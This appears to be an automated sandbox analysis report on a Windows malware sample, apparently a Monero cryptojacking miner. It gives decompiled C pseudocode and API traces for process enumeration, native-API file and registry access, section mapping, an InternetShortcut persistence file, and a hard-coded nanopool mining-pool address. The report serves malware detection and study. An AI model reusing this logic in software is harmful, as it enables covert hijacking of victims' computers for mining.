                                                                                                        0x004081f5
                                                                                                        0x00000000
                                                                                                        0x004081f7
                                                                                                        0x00408203
                                                                                                        0x00408208
                                                                                                        0x0040820d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040820d
                                                                                                        0x004081f5
                                                                                                        0x004081dd
                                                                                                        0x00000000
                                                                                                        0x0040821e
                                                                                                        0x00408228
                                                                                                        0x0040822d
                                                                                                        0x004081c0
                                                                                                        0x00408231
                                                                                                        0x00408234
                                                                                                        0x0040823a
                                                                                                        0x00408240
                                                                                                        0x00408243
                                                                                                        0x00408243
                                                                                                        0x00408250
                                                                                                        0x00408116
                                                                                                        0x0040811d
                                                                                                        0x0040811d
                                                                                                        0x00408114

                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00408107
                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,004067D1,00000002,00000000,7519F7F0,00000000), ref: 00408126
                                                                                                        • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 00408139
                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00408149
                                                                                                        • Process32Next.KERNEL32 ref: 004081B6
                                                                                                        • ProcessIdToSessionId.KERNELBASE(?,00000000,00001000,00000128,00000000,00000128), ref: 004081D7
                                                                                                        • Process32Next.KERNEL32 ref: 00408228
                                                                                                        • FindCloseChangeNotification.KERNELBASE(00001000,00001000,00000128,00000000,00000128), ref: 00408234
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00408243
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$LibraryNext$AddressChangeCloseCreateFindFirstFreeLoadNotificationProcProcessSessionSnapshotToolhelp32
                                                                                                        • String ID: ProcessIdToSessionId$csrss.exe$csrss.exe$explorer.exe$kernel32.dll$winlogon.exe$winlogon.exe
                                                                                                        • API String ID: 2499658570-4289567422
                                                                                                        • Opcode ID: 98e22b258cce26b2785233436b6d0c16d26097fc0348f6c4cb321f3f24bafe53
                                                                                                        • Instruction ID: e2503db8604718d0b55e8117c492ad94a53ae061e857ffc76dcc057c8b58004a
                                                                                                        • Opcode Fuzzy Hash: 98e22b258cce26b2785233436b6d0c16d26097fc0348f6c4cb321f3f24bafe53
                                                                                                        • Instruction Fuzzy Hash: FC41A8759002186BDF10AF60DE41BEA77A8AF54345F0001BEFD44F62C1EF398E51CA99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004037E0, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 127nativefilememoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 44%
                                                                                                        			E004037E0(void* __eflags, char _a4) {
				void* _v8;
				long _v12;
				long _v16;
				long _v20;
				void* _v24;
				char _v32;
				long _v36;
				void* _v40;
				long _v44;
				long _v48;
				long _v52;
				long _v56;
				intOrPtr _v60;
				char* _v64;
				long _v68;
				void* _v72;
				void* _t35;
				long* _t45;
				void* _t50;
				intOrPtr _t59;
				void* _t60;

				_t1 =  &_a4; // 0x40476c
				_t59 =  *_t1;
				_t35 = E00407ED0(_t59); // executed
				if(_t35 == 0) {
					L11:
					return 0;
				} else {
					_push(0);
					_push(0);
					_v8 = 0;
					asm("xorps xmm0, xmm0");
					_v72 = 0;
					_push( &_v32);
					_push(_t59);
					asm("movups [ebp-0x40], xmm0");
					_v52 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v40 = 0;
					_v36 = 0;
					_v48 = 0;
					_v44 = 0;
					asm("movq [ebp-0x1c], xmm0");
					if( *0x5d10b8() != 1) {
						goto L11;
					} else {
						_v72 = 0x18;
						_v64 =  &_v32;
						_v68 = 0;
						_v60 = 0x40;
						_v56 = 0;
						_v52 = 0;
						if(NtCreateFile( &_v8, 0x120089,  &_v72,  &_v24,  &_v40, 0x80, 3, 1, 0x60, 0, 0) != 0) {
							goto L11;
						} else {
							_t45 =  &_v16;
							__imp__GetFileSizeEx(_v8, _t45);
							if(_t45 == 0 || _v16 != 0xcc8 || _v12 != 0) {
								L10:
								NtClose(_v8);
								goto L11;
							} else {
								_t60 = VirtualAlloc(0, 0xcc8, 0x3000, 4);
								if(_t60 == 0) {
									goto L10;
								} else {
									_t50 =  *0x5d10bc(_v8, 0, 0, 0,  &_v24, _t60, _v16,  &_v48, 0);
									_push(_v8);
									if(_t50 == 0) {
										NtClose();
										E00401640("xmr-us-east1.nanopool.org:14444", _t60, 0xcc8);
										E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
										VirtualFree(_t60, 0, 0x8000);
										return 1;
									} else {
										NtClose();
										VirtualFree(_t60, 0, 0x8000);
										return 0;
									}
								}
							}
						}
					}
				}
			}
























                                                                                                        0x004037e7
                                                                                                        0x004037e7
                                                                                                        0x004037eb
                                                                                                        0x004037f5
                                                                                                        0x0040399f
                                                                                                        0x004039a5
                                                                                                        0x004037fb
                                                                                                        0x004037fb
                                                                                                        0x004037fd
                                                                                                        0x00403802
                                                                                                        0x00403809
                                                                                                        0x0040380c
                                                                                                        0x00403813
                                                                                                        0x00403814
                                                                                                        0x00403815
                                                                                                        0x00403819
                                                                                                        0x00403820
                                                                                                        0x00403827
                                                                                                        0x0040382e
                                                                                                        0x00403835
                                                                                                        0x0040383c
                                                                                                        0x00403843
                                                                                                        0x0040384a
                                                                                                        0x00403851
                                                                                                        0x00403858
                                                                                                        0x00403865
                                                                                                        0x00000000
                                                                                                        0x0040386b
                                                                                                        0x0040387d
                                                                                                        0x00403884
                                                                                                        0x0040388e
                                                                                                        0x00403899
                                                                                                        0x004038a9
                                                                                                        0x004038b1
                                                                                                        0x004038c0
                                                                                                        0x00000000
                                                                                                        0x004038c6
                                                                                                        0x004038c6
                                                                                                        0x004038cd
                                                                                                        0x004038d5
                                                                                                        0x00403996
                                                                                                        0x00403999
                                                                                                        0x00000000
                                                                                                        0x004038f2
                                                                                                        0x00403906
                                                                                                        0x0040390a
                                                                                                        0x00000000
                                                                                                        0x00403910
                                                                                                        0x00403927
                                                                                                        0x0040392d
                                                                                                        0x00403932
                                                                                                        0x0040394f
                                                                                                        0x00403960
                                                                                                        0x00403976
                                                                                                        0x00403986
                                                                                                        0x00403995
                                                                                                        0x00403934
                                                                                                        0x00403934
                                                                                                        0x00403942
                                                                                                        0x0040394e
                                                                                                        0x0040394e
                                                                                                        0x00403932
                                                                                                        0x0040390a
                                                                                                        0x004038d5
                                                                                                        0x004038c0
                                                                                                        0x00403865

                                                                                                        APIs
                                                                                                          • Part of subcall function 00407ED0: GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(lG@,?,00000000,00000000), ref: 0040385D
                                                                                                        • NtCreateFile.NTDLL(00000000,00120089,00000018,00000000,00000000,00000080,00000003,00000001,00000060,00000000,00000000), ref: 004038B8
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 004038CD
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000CC8,00003000,00000004), ref: 00403900
                                                                                                        • NtReadFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000CC8,00000000,00000000), ref: 00403927
                                                                                                        • NtClose.NTDLL(00000000), ref: 00403934
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403942
                                                                                                        • NtClose.NTDLL(00000000), ref: 0040394F
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403986
                                                                                                        • NtClose.NTDLL(00000000), ref: 00403999
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseVirtual$FreePath$AllocAttributesCreateNameName_ReadSize
                                                                                                        • String ID: 0125789244697858$@$lG@$xmr-us-east1.nanopool.org:14444
                                                                                                        • API String ID: 27938546-2795650337
                                                                                                        • Opcode ID: 1db646025260cd4b6ae9ac45ca5030c30e6a6c58ae7cead9cd14b8e1dcc3d868
                                                                                                        • Instruction ID: 5038ae2be3a5952dc9e1581431ce3c004cda8172756abbfe488321c7fd1decdf
                                                                                                        • Opcode Fuzzy Hash: 1db646025260cd4b6ae9ac45ca5030c30e6a6c58ae7cead9cd14b8e1dcc3d868
                                                                                                        • Instruction Fuzzy Hash: AF413DB0E41218BBEB209F94DD0AFDEBBB8AB04715F104167F504B52C0D7B95A488BA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004085B0, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 105nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 76%
                                                                                                        			E004085B0(void* __ecx, void* __eflags, long _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				void* _v8;
				void* _v16;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v240;
				void _v248;
				char _v1272;
				short _v3320;
				long _t35;
				long _t53;
				long _t58;

				_v8 = 0;
				E00401BB0( &_v3320, 0, 0x800);
				_t35 = _a4;
				if(_t35 != 0x80000002) {
					if(_t35 != 0x80000001) {
						goto L8;
					} else {
						E00401BB0( &_v1272, 0, 0x400);
						if(E004082B0( &_v1272) == 0) {
							goto L8;
						} else {
							E00401A00( &_v3320, L"\\Registry\\User\\");
							E00401970( &_v3320,  &_v1272);
							goto L5;
						}
					}
				} else {
					E00401A00( &_v3320, L"\\Registry\\Machine");
					L5:
					E00401970( &_v3320, _a8);
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0xc], xmm0");
					RtlInitUnicodeString( &_v16,  &_v3320);
					_v48 = 0x18;
					_v40 =  &_v16;
					_v44 = 0;
					_v36 = 0x40;
					_v32 = 0;
					_v28 = 0;
					_t53 = NtOpenKey( &_v8, 0x20119,  &_v48); // executed
					if(_t53 < 0) {
						L8:
						return 0;
					} else {
						asm("xorps xmm0, xmm0");
						asm("movq [ebp-0x14], xmm0");
						RtlInitUnicodeString( &_v24, _a12);
						_t58 = NtQueryValueKey(_v8,  &_v24, 1,  &_v248, 0xc8,  &_a4); // executed
						_push(_v8);
						if(_t58 >= 0) {
							NtClose();
							E00401A00(_a16, _v240 +  &_v248);
							return 1;
						} else {
							NtClose();
							goto L8;
						}
					}
				}
			}



















                                                                                                        0x004085c4
                                                                                                        0x004085ce
                                                                                                        0x004085d3
                                                                                                        0x004085de
                                                                                                        0x004085fb
                                                                                                        0x00000000
                                                                                                        0x00408601
                                                                                                        0x0040860f
                                                                                                        0x00408625
                                                                                                        0x00000000
                                                                                                        0x0040862b
                                                                                                        0x00408637
                                                                                                        0x0040864a
                                                                                                        0x00000000
                                                                                                        0x0040864f
                                                                                                        0x00408625
                                                                                                        0x004085e0
                                                                                                        0x004085ec
                                                                                                        0x00408652
                                                                                                        0x0040865c
                                                                                                        0x0040866a
                                                                                                        0x0040866d
                                                                                                        0x00408677
                                                                                                        0x00408680
                                                                                                        0x00408687
                                                                                                        0x00408696
                                                                                                        0x0040869e
                                                                                                        0x004086a5
                                                                                                        0x004086ac
                                                                                                        0x004086b3
                                                                                                        0x004086bb
                                                                                                        0x004086fe
                                                                                                        0x00408703
                                                                                                        0x004086bd
                                                                                                        0x004086c3
                                                                                                        0x004086c7
                                                                                                        0x004086cc
                                                                                                        0x004086eb
                                                                                                        0x004086f1
                                                                                                        0x004086f6
                                                                                                        0x00408704
                                                                                                        0x0040871c
                                                                                                        0x0040872c
                                                                                                        0x004086f8
                                                                                                        0x004086f8
                                                                                                        0x00000000
                                                                                                        0x004086f8
                                                                                                        0x004086f6
                                                                                                        0x004086bb

                                                                                                        APIs
                                                                                                        • RtlInitUnicodeString.NTDLL(?,?), ref: 00408677
                                                                                                        • NtOpenKey.NTDLL(00000000,00020119,00000018), ref: 004086B3
                                                                                                        • RtlInitUnicodeString.NTDLL(75144D40,00000000), ref: 004086CC
                                                                                                        • NtQueryValueKey.NTDLL(00000000,75144D40,00000001,?,000000C8,00404596), ref: 004086EB
                                                                                                        • NtClose.NTDLL(00000000), ref: 004086F8
                                                                                                        • NtClose.NTDLL(00000000), ref: 00408704
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseInitStringUnicode$OpenQueryValue
                                                                                                        • String ID: @$\Registry\Machine$\Registry\User\
                                                                                                        • API String ID: 2538698014-2338602205
                                                                                                        • Opcode ID: 1e4a2f9ca1f13b42ab8a43e3d6aa5f8f717dc5ca93966d64937e1c4d3befbe2b
                                                                                                        • Instruction ID: d2628628a94712c675b0c195a5174935581fdd4bc81ba0214100a7ffc09d6dc1
                                                                                                        • Opcode Fuzzy Hash: 1e4a2f9ca1f13b42ab8a43e3d6aa5f8f717dc5ca93966d64937e1c4d3befbe2b
                                                                                                        • Instruction Fuzzy Hash: 1C412FB1D4020EABDB10DBA0CD45FEE77BCAF14308F1045B6F904F2191EB799A589B59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402E40, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 111nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00402E40(void* __ecx, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				long _v12;
				intOrPtr _v16;
				short _v18;
				char _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				char* _v36;
				long _v40;
				void* _v44;
				short _t35;
				long _t41;
				void* _t44;
				void* _t48;
				void* _t50;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;

				_t54 = __ecx;
				_v12 = 0;
				if(_a8 != 0) {
					 *0x5d1134 = 0;
					goto L4;
				} else {
					_t48 =  *0x5d1134; // 0x3430000
					if(_t48 == 0) {
						L4:
						_t62 =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14)))) + 0x10);
						if(_t62 != 0) {
							_v8 = E00402F80(_t54, _t62, "NtOpenSection");
							_t50 = E00402F80(_t54, _t62, "NtMapViewOfSection");
							_t57 = E00402F80(_t54, _t62, "NtClose");
							if(_v8 == 0 || _t50 == 0) {
								L12:
								return 0;
							} else {
								_t55 = _a4;
								_v16 = _a4;
								_t35 = (E00401B40(_a4) & 0x0000ffff) + (E00401B40(_a4) & 0x0000ffff);
								_v44 = 0x18;
								_v20 = _t35;
								_v18 = _t35;
								_v36 =  &_v20;
								_v40 = 0;
								_v32 = 0x40;
								_v28 = 0;
								_v24 = 0;
								if(NtOpenSection( &_a8, 0xc,  &_v44) >= 0) {
									_t41 = NtMapViewOfSection(_a8, 0xffffffff, 0x5d1134, 0, 0, 0,  &_v12, 1, 0, 2); // executed
									_push(_a8);
									if(_t41 >= 0) {
										if( *0x5d1134 == 0) {
											goto L11;
										} else {
											NtClose();
											_t44 =  *0x5d1134; // 0x3430000
											return _t44;
										}
									} else {
										L11:
										 *_t57();
										goto L12;
									}
								} else {
									E00402DD0(_t55);
									 *0x5d1134 = _t62;
									return _t62;
								}
							}
						} else {
							return 0;
						}
					} else {
						return _t48;
					}
				}
			}






















                                                                                                        0x00402e40
                                                                                                        0x00402e4a
                                                                                                        0x00402e51
                                                                                                        0x00402e60
                                                                                                        0x00000000
                                                                                                        0x00402e53
                                                                                                        0x00402e53
                                                                                                        0x00402e5a
                                                                                                        0x00402e6a
                                                                                                        0x00402e79
                                                                                                        0x00402e7e
                                                                                                        0x00402e9a
                                                                                                        0x00402ea8
                                                                                                        0x00402eb2
                                                                                                        0x00402eb8
                                                                                                        0x00402f55
                                                                                                        0x00402f5d
                                                                                                        0x00402ec6
                                                                                                        0x00402ec6
                                                                                                        0x00402eca
                                                                                                        0x00402ed8
                                                                                                        0x00402eda
                                                                                                        0x00402ee1
                                                                                                        0x00402ee5
                                                                                                        0x00402eec
                                                                                                        0x00402ef8
                                                                                                        0x00402f00
                                                                                                        0x00402f07
                                                                                                        0x00402f0e
                                                                                                        0x00402f1a
                                                                                                        0x00402f4a
                                                                                                        0x00402f4c
                                                                                                        0x00402f51
                                                                                                        0x00402f65
                                                                                                        0x00000000
                                                                                                        0x00402f67
                                                                                                        0x00402f67
                                                                                                        0x00402f69
                                                                                                        0x00402f74
                                                                                                        0x00402f74
                                                                                                        0x00402f53
                                                                                                        0x00402f53
                                                                                                        0x00402f53
                                                                                                        0x00000000
                                                                                                        0x00402f53
                                                                                                        0x00402f1c
                                                                                                        0x00402f1c
                                                                                                        0x00402f23
                                                                                                        0x00402f2f
                                                                                                        0x00402f2f
                                                                                                        0x00402f1a
                                                                                                        0x00402e80
                                                                                                        0x00402e86
                                                                                                        0x00402e86
                                                                                                        0x00402e5f
                                                                                                        0x00402e5f
                                                                                                        0x00402e5f
                                                                                                        0x00402e5a

                                                                                                        APIs
                                                                                                        • NtOpenSection.NTDLL(00000000,0000000C,00000018,?,?,?,?,75144D40,00000000,00000000), ref: 00402F15
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: OpenSection
                                                                                                        • String ID: @$NtClose$NtMapViewOfSection$NtOpenSection
                                                                                                        • API String ID: 1950954290-3069760132
                                                                                                        • Opcode ID: 17615c4fecd44b4c39521a1cccd82976107e2cb8dff730541d4d008ca0a3743f
                                                                                                        • Instruction ID: 4647d7da09d8d8885e3b0c4b8fe7eb1682a85353f2c0fdbf0df9b865095ef5b3
                                                                                                        • Opcode Fuzzy Hash: 17615c4fecd44b4c39521a1cccd82976107e2cb8dff730541d4d008ca0a3743f
                                                                                                        • Instruction Fuzzy Hash: 1D319371A01219ABDB10DFA9DD45BDEB7B8EB04714F10416BE908F72C0D7B99A04DB98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407AF0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92nativefileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 20%
                                                                                                        			E00407AF0(WCHAR* _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				void* _v16;
				long _v20;
				char _v24;
				long _v28;
				void* _v32;
				long _v36;
				long _v40;
				long _v44;
				long _v48;
				intOrPtr _v52;
				char* _v56;
				long _v60;
				void* _v64;
				signed char _t35;
				signed int _t36;
				long _t45;
				void* _t48;
				void* _t54;

				_t35 = GetFileAttributesW(_a4); // executed
				if(_t35 == 0xffffffff || (_t35 & 0x00000010) != 0) {
					asm("xorps xmm0, xmm0");
					_v8 = 0;
					_v64 = 0;
					asm("movups [ebp-0x38], xmm0");
					_v44 = 0;
					_v16 = 0;
					_v12 = 0;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_t36 = E00401B40(_a8);
					_v20 = 0;
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0x14], xmm0");
					_t54 = 2 + _t36 * 2;
					_push(0);
					_push(0);
					_push( &_v24);
					_push(_a4);
					if( *0x5d10b8() != 1) {
						L7:
						return 0; // executed
					} else {
						_v64 = 0x18;
						_v56 =  &_v24;
						_v60 = 0;
						_v52 = 0x40;
						_v48 = 0;
						_v44 = 0;
						_t45 = NtCreateFile( &_v8, 0x120116,  &_v64,  &_v16,  &_v32, 0x80, 0, 0, 0x60, 0, 0); // executed
						if(_t45 != 0) {
							goto L7;
						} else {
							_t48 =  *0x5d10c0(_v8, 0, 0, 0,  &_v16, _a8, _t54,  &_v40, _t45); // executed
							_push(_v8);
							if(_t48 == 0) {
								NtClose(); // executed
								return 1;
							} else {
								NtClose();
								goto L7;
							}
						}
					}
				} else {
					return 1;
				}
			}























                                                                                                        0x00407af9
                                                                                                        0x00407b02
                                                                                                        0x00407b15
                                                                                                        0x00407b18
                                                                                                        0x00407b1f
                                                                                                        0x00407b26
                                                                                                        0x00407b2a
                                                                                                        0x00407b31
                                                                                                        0x00407b38
                                                                                                        0x00407b3f
                                                                                                        0x00407b46
                                                                                                        0x00407b4d
                                                                                                        0x00407b54
                                                                                                        0x00407b5b
                                                                                                        0x00407b63
                                                                                                        0x00407b6a
                                                                                                        0x00407b6d
                                                                                                        0x00407b72
                                                                                                        0x00407b79
                                                                                                        0x00407b7b
                                                                                                        0x00407b80
                                                                                                        0x00407b81
                                                                                                        0x00407b8c
                                                                                                        0x00407c12
                                                                                                        0x00407c18
                                                                                                        0x00407b92
                                                                                                        0x00407ba4
                                                                                                        0x00407bab
                                                                                                        0x00407bb5
                                                                                                        0x00407bc0
                                                                                                        0x00407bd0
                                                                                                        0x00407bd8
                                                                                                        0x00407bdf
                                                                                                        0x00407be7
                                                                                                        0x00000000
                                                                                                        0x00407be9
                                                                                                        0x00407bff
                                                                                                        0x00407c05
                                                                                                        0x00407c0a
                                                                                                        0x00407c19
                                                                                                        0x00407c28
                                                                                                        0x00407c0c
                                                                                                        0x00407c0c
                                                                                                        0x00000000
                                                                                                        0x00407c0c
                                                                                                        0x00407c0a
                                                                                                        0x00407be7
                                                                                                        0x00407b08
                                                                                                        0x00407b10
                                                                                                        0x00407b10

                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,0040685B,?,?,?,.exe",?,?,?,[InternetShortcut]URL="file:///), ref: 00407AF9
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00407B84
                                                                                                        • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00407BDF
                                                                                                        • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407BFF
                                                                                                        • NtClose.NTDLL(00000000), ref: 00407C0C
                                                                                                        • NtClose.NTDLL(00000000), ref: 00407C19
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$ClosePath$AttributesCreateNameName_Write
                                                                                                        • String ID: @
                                                                                                        • API String ID: 2032416576-2766056989
                                                                                                        • Opcode ID: b68e2da1d8a01fec83c1ced52e1a281f962c96c99bbb349389263c075fbb7d0c
                                                                                                        • Instruction ID: 9f52158c82e738a9b8372dbf463c3a00265b35efd882e416b0d337a0f99a21ed
                                                                                                        • Opcode Fuzzy Hash: b68e2da1d8a01fec83c1ced52e1a281f962c96c99bbb349389263c075fbb7d0c
                                                                                                        • Instruction Fuzzy Hash: 0E314270D4020CBBEF10DF90DD49BDEBBB8EB04314F208256F904B62D0D7B66A989B95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403BC0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63nativefileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 35%
                                                                                                        			E00403BC0(char _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				long _v20;
				void* _v24;
				long _v28;
				long _v32;
				long _v36;
				long _v40;
				intOrPtr _v44;
				char* _v48;
				long _v52;
				void* _v56;
				long _t29;
				void* _t33;

				asm("xorps xmm0, xmm0");
				_v36 = 0;
				asm("movups [ebp-0x30], xmm0");
				_v8 = 0;
				_v48 =  &_a4;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v20 = 0;
				_v32 = 0;
				_v28 = 0;
				_v56 = 0x18;
				_v52 = 0;
				_v44 = 0x40;
				_v40 = 0;
				_v36 = 0;
				_t29 = NtCreateFile( &_v8, 0x120116,  &_v56,  &_v16,  &_v24, 0x80, 0, 0, 0x60, 0, 0); // executed
				if(_t29 != 0) {
					L3:
					return 0;
				} else {
					_t33 =  *0x5d10c0(_v8, 0, 0, 0,  &_v16, "xmr-us-east1.nanopool.org:14444", 0xcc8,  &_v32, _t29); // executed
					_push(_v8);
					if(_t33 == 0) {
						NtClose();
						return 1;
					} else {
						NtClose();
						goto L3;
					}
				}
			}


















                                                                                                        0x00403bd0
                                                                                                        0x00403bd3
                                                                                                        0x00403bda
                                                                                                        0x00403be6
                                                                                                        0x00403bed
                                                                                                        0x00403bf7
                                                                                                        0x00403c02
                                                                                                        0x00403c12
                                                                                                        0x00403c1a
                                                                                                        0x00403c21
                                                                                                        0x00403c28
                                                                                                        0x00403c2f
                                                                                                        0x00403c36
                                                                                                        0x00403c3d
                                                                                                        0x00403c44
                                                                                                        0x00403c4b
                                                                                                        0x00403c52
                                                                                                        0x00403c5a
                                                                                                        0x00403c8b
                                                                                                        0x00403c90
                                                                                                        0x00403c5c
                                                                                                        0x00403c78
                                                                                                        0x00403c7e
                                                                                                        0x00403c83
                                                                                                        0x00403c91
                                                                                                        0x00403c9f
                                                                                                        0x00403c85
                                                                                                        0x00403c85
                                                                                                        0x00000000
                                                                                                        0x00403c85
                                                                                                        0x00403c83

                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(00000000,00120116,?,00403B8C,?,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00403C52
                                                                                                        • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,xmr-us-east1.nanopool.org:14444,00000CC8,00000000,00000000), ref: 00403C78
                                                                                                        • NtClose.NTDLL(00000000), ref: 00403C85
                                                                                                        • NtClose.NTDLL(00000000), ref: 00403C91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFile$CreateWrite
                                                                                                        • String ID: @$xmr-us-east1.nanopool.org:14444
                                                                                                        • API String ID: 3559581051-493715795
                                                                                                        • Opcode ID: 56d88aa81e982c61328a5cbb6ae928bc3dbf0937083e45afe5ced92eb89ea321
                                                                                                        • Instruction ID: 92c5b12b779cf31cce4769230797ba73a26a306a4adc66bd02839d29b74e70ae
                                                                                                        • Opcode Fuzzy Hash: 56d88aa81e982c61328a5cbb6ae928bc3dbf0937083e45afe5ced92eb89ea321
                                                                                                        • Instruction Fuzzy Hash: A521EDB1E4120DBBEB10DF90DD49BDFBBB8EB04704F204256F904B62C0D7B95A489B99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403720, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(005D2DF0,00120089,?,]D@,00000000,00000080,00000001,00000001,00000060,00000000,00000000), ref: 004037A4
                                                                                                        • NtCreateFile.NTDLL(005D2124,00120089,?,]D@,00000000,00000080,00000001,00000001,00000060,00000000,00000000), ref: 004037C1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID: @$]D@
                                                                                                        • API String ID: 823142352-925688143
                                                                                                        • Opcode ID: 03611e97650f41380acb2e73d0c1b10cf4d46751ae042211fc88b9fc410341d6
                                                                                                        • Instruction ID: 29e337131a3785b045790d3cbff8cd25c944f4b1d8e7a2be103306273d9b840e
                                                                                                        • Opcode Fuzzy Hash: 03611e97650f41380acb2e73d0c1b10cf4d46751ae042211fc88b9fc410341d6
                                                                                                        • Instruction Fuzzy Hash: CD118FB0A4130DABEB20DF90CD49BDEBBF8BB18315F10835BE514B62C0D7B556488B98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406990, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43filenativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 18%
                                                                                                        			E00406990(char _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				char* _v44;
				long _v48;
				void* _v52;
				long _t25;

				_t1 =  &_v12; // 0x406875
				_v52 = 0;
				_t3 =  &_a4; // 0x406875
				asm("xorps xmm0, xmm0");
				_v32 = 0;
				asm("movups [ebp-0x2c], xmm0");
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				asm("movq [ebp-0x8], xmm0");
				 *0x5d10b8( *_t3, _t1, 0, 0);
				_v52 = 0x18;
				_v44 =  &_v12;
				_v48 = 0;
				_v40 = 0x40;
				_v36 = 0;
				_v32 = 0;
				_t25 = NtCreateFile(0x5d2dfc, 0x120089,  &_v52,  &_v28,  &_v20, 0x80, 0, 1, 0x60, 0, 0); // executed
				return _t25;
			}















                                                                                                        0x0040699a
                                                                                                        0x0040699d
                                                                                                        0x004069a5
                                                                                                        0x004069a8
                                                                                                        0x004069ab
